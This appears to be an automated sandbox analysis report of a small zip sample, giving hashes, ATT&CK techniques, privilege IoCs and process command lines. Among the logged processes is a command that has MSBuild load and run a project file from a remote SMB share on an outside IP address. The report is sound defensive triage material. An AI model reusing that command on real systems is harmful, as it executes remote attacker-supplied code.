a057d61ac5fb3cace08ae75ebb0856501d8ef0186f0e9c6e44788d41e92b5829

Analysis

max time kernel
140s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20230915-es
resource tags

arch:x64arch:x86image:win10v2004-20230915-eslocale:es-esos:windows10-2004-x64systemwindows
submitted
21/09/2023, 14:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dbeb4960cdb04999c1a5a3360c9112e3bc1de79534d7ac9027b7fdb7798968a6.zip
Size

1KB
MD5

2827d72af21f85405d60329c4a8533b3
SHA1

db1ba92101c66ab878a5df8d5f3b96aeb4ad5d2d
SHA256

a057d61ac5fb3cace08ae75ebb0856501d8ef0186f0e9c6e44788d41e92b5829
SHA512

994ed28ee404e4e2b3ace3f4d250bb53068d4b13c6ea87a45410899a6800e9a4eeb786f5c4c3c7e4125fa9dd324a7baf93545d2b6c4c8c6980f40bcc06b897c0

Score

6^/10

Malware Config

Signatures

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\E:	notepad.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeRestorePrivilege	3912	7zG.exe
Token: 35	3912	7zG.exe
Token: SeSecurityPrivilege	3912	7zG.exe
Token: SeSecurityPrivilege	3912	7zG.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
3912	7zG.exe
2264	notepad.exe

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\dbeb4960cdb04999c1a5a3360c9112e3bc1de79534d7ac9027b7fdb7798968a6.zip
1⤵
PID:4844

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3348

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap19244:186:7zEvent28922
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3912

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" -nologo \\216.250.251.196\file\sad.xml
1⤵
PID:3456

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" -nologo \\216.250.251.196\file\sad.xml
1⤵
PID:4444

C:\Windows\system32\notepad.exe
"C:\Windows\system32\notepad.exe"
1⤵
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:2264

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log

Filesize
841B

MD5
0efd0cfcc86075d96e951890baf0fa87

SHA1
6e98c66d43aa3f01b2395048e754d69b7386b511

SHA256
ff981780f37479af6a428dd121eef68cf6e0b471ae92f080893a55320cc993f7

SHA512
4e79f5a8494aac94f98af8dbbc71bdd0a57b02103757ad970da7e7d4e6a0dc5015ca008256a6bd2c5bdec3a0f5736a994e17b3ef004b0f374a3339e480ac41b1

Download Submit
memory/3456-2-0x0000000075000000-0x00000000757B0000-memory.dmp

Filesize
7.7MB

Download
memory/3456-3-0x0000000000C30000-0x0000000000C70000-memory.dmp

Filesize
256KB

Download
memory/3456-4-0x0000000005540000-0x000000000555A000-memory.dmp

Filesize
104KB

Download
memory/3456-5-0x0000000005790000-0x00000000058EA000-memory.dmp

Filesize
1.4MB

Download
memory/3456-6-0x0000000005620000-0x0000000005630000-memory.dmp

Filesize
64KB

Download
memory/3456-7-0x00000000055E0000-0x00000000055F0000-memory.dmp

Filesize
64KB

Download
memory/3456-9-0x0000000075000000-0x00000000757B0000-memory.dmp

Filesize
7.7MB

Download
memory/4444-11-0x0000000075000000-0x00000000757B0000-memory.dmp

Filesize
7.7MB

Download
memory/4444-12-0x0000000075000000-0x00000000757B0000-memory.dmp

Filesize
7.7MB

Download